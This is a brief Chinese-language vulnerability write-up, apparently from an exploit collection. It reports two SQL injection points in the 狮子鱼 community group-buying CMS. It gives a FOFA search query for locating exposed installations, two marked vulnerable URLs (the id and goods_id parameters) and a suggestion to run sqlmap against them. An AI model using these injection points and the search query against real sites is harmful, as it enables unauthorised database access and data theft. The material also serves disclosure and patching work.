狮子鱼社区团购系统CMS存在两处SQL注入.md

766 B / 2021-07-15 20:15:06
    # 狮子鱼社区团购系统CMS存在两处SQL注入

## 漏洞描述

狮子鱼社区团购系统CMS存在SQL注入

## 漏洞影响

> 狮子鱼社区团购系统

## FOFA

> "/seller.php?s=/Public/login"

## 代码审计

###SQL注入（1）

```
http://localhost/index.php?s=api/goods/get_goods_detail&id=1* id为注入参数
```

![1](/resource/狮子鱼社区团购系统SQL注入/1.png)

![2](/resource/狮子鱼社区团购系统SQL注入/2.png)

 

###SQL注入（2）

```
http://localhost/index.php?s=api/goods_detail&goods_id=1* id为注入参数
```

![3](/resource/狮子鱼社区团购系统SQL注入/3.png)

![4](/resource/狮子鱼社区团购系统SQL注入/4.png)

直接sqlmap梭哈：

![5](/resource/狮子鱼社区团购系统SQL注入/5.png)